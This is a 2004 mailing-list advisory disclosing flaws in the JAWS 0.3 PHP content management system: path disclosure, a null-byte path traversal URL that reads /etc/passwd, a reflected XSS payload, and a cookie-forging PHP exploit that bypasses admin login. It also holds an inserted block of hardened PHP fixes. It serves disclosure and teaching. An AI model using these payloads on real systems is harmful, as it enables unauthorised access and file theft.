Message-ID: <3213.200.21.110.32.1089098388.squirrel@webmail.gigax.org>
From: nando at gigax.org (nando@...ax.org)
Subject: Multiple vulnerabilities in JAWS
check this...
/////////////////////////////////////////////////////
//// Vulnerable Program: JAWS
////
//// Version : 0.3 ; it's BETA probably ;)
////
//// Url: http://www.jaws.com.mx
////
//// The Bug: Multiple vulnerabilities
////
//// Date: Today, July 5, 2004
////
//// Author: Fernando Quintero (a.k.a nonroot)
//// Email: nando@...ax.org
//////////////////////////////////////////////////////
I. Affected software description:
Jaws is a Framework and Content Management System for building dynamic web sites.
It aims to be User Friendly, giving ease of use and lots of ways to customize web sites,
but at the same time it is Developer Friendly: it offers a simple and powerful framework
to hack your own modules. Jaws is Free Software under the GPL.
note: to hack your own modules, to hack your own modules, to hack your own modules... ;)
II. Bugs
There are several vulnerabilities in the JAWS code; they were fixed quickly
by its main coder.
1) Full path disclosure ...
There are many ways to determine the full path to the web root directory:
a) http://127.0.0.1/jaws/index.php?gadget=filebrowser&path=/etc
Specifying a "path" value that does not exist.
b) function jaws_error($text, $file, $line)
   {
       print ("<b style=\"color: #f00;\">JAWS Error:</b><br/>".$text."<br/><i>".$file.", line ".$line);
       exit;
   }
The jaws_error() function prints the line number and the full path of the
file in which the error occurred.
c) http://127.0.0.1/jaws/include/config.php
Requesting a file in the include directory directly.
2) Arbitrary file browsing.
A file's contents can be read through the "gadget" variable:
http://127.0.0.1/jaws/index.php?gadget=../../../../../../../../../../etc/passwd%00&path=/etc
This URL shows us the passwd file.
The "path" variable is irrelevant here: in the code a line like
$path = str_replace("..", "", $path);
filters the content of "path", but in the index.php file the "gadget"
variable is not filtered at all.
The "%00" is necessary because the script appends the extension ".php" to
the value of the "gadget" variable.
3) XSS (the fashionable word)
Cross-site scripting through the "action" variable, because the script
echoes the content of the variable back to the browser:
http://127.0.0.1/jaws/index.php?gadget=[a valid gadget]&action=<b>bold letter</b>
http://127.0.0.1/jaws/index.php?gadget=[a valid gadget]&action=<script>alert('Colombia Rulx!!');</script>
In index.php the vulnerable code is:
jaws_error("Invalid operation: You can't display this action [".$go_gadget->name."::".$go_gadget->action."]", __FILE__, __LINE__);
where $go_gadget->action contains the erroneous action, unescaped.
4) Validation without a password :)
There is a way to get into the control panel with administrator rights
without a password.
The admin.php file has:
//
if ($GLOBALS["app"]->logged_on())
{
    control panel code...
    ...
}
//
The logged_on() function is in the application.php file.
The function's code:
//
function logged_on()
{
    return (md5($_SESSION["logged"]) == $_COOKIE["logged"]);
}
//
It is strange to see this type of validation, but there it is!
Before entering the Control Panel, the $_SESSION["logged"] variable has a
null ("") value, so md5() of it is a constant that anyone can compute.
A possible way to exploit it would be:
//BEGIN
//exploit.php
<?php
setcookie("logged", "d41d8cd98f00b204e9800998ecf8427e", time() + 86400*365, 'path to jaws');
?>
//END
Where "d41d8cd98f00b204e9800998ecf8427e" is the MD5 hash of the null ("") value.
This way we can create a cookie (that looks like it was set by the remote
system) and then try the URL:
http://127.0.0.1/jaws/admin.php
and we will be inside.
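For comparison, here are hardened counterparts of the code quoted in bugs 1b, 2, 3 and 4. This is an added illustration, not JAWS code; it assumes gadgets live as <name>.php under a gadgets directory and that a login routine (not shown) sets $_SESSION['logged'] to true only after verifying the password.

```php
<?php
// Added example, not JAWS code: hardened counterparts of the three pieces
// of code the advisory quotes. Assumed layout: gadgets are <name>.php
// under $gadgetDir; the login routine (not shown) sets $_SESSION['logged']
// to true only after verifying the password.

// Gadget loading: only a plain identifier may be turned into a file name,
// so "../", null bytes and absolute paths never reach include().
function safe_gadget_file(string $gadgetDir, string $gadget): ?string
{
    if (!preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $gadget)) {
        return null;                     // "../../etc/passwd\0" fails here
    }
    $base = realpath($gadgetDir);
    $real = realpath($gadgetDir . '/' . $gadget . '.php');
    // Second line of defence: the resolved file must live inside $gadgetDir.
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// Admin check: the session is the only source of truth. No cookie value is
// compared against a hash of a possibly-empty session variable, so sending
// md5("") in a cookie no longer grants access.
function logged_on_fixed(array $session): bool
{
    return isset($session['logged']) && $session['logged'] === true;
}

// Error reporting: the full path and line number go to the server log only;
// the browser gets an HTML-escaped message. Escaping also closes the XSS in
// the "Invalid operation" message, which echoed the action verbatim.
function jaws_error_fixed(string $text, string $file, int $line): void
{
    error_log(sprintf('JAWS error: %s (%s:%d)', $text, $file, $line));
    $safe = htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
    print '<b style="color: #f00;">JAWS Error:</b><br/>' . $safe;
    exit;
}
```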
III. Solution
????????
The main coder was contacted and the code was fixed in the cvs ;).
IV. Greetings
- Greets to GIGAX people.
- Greets to all the community. I learn from you!
V. Contact
Fernando Quintero
nando@...ax.org
Medellín, Colombia
VI. Final words
- Sorry for the English and !!! Viva Colombia !!!!!!!!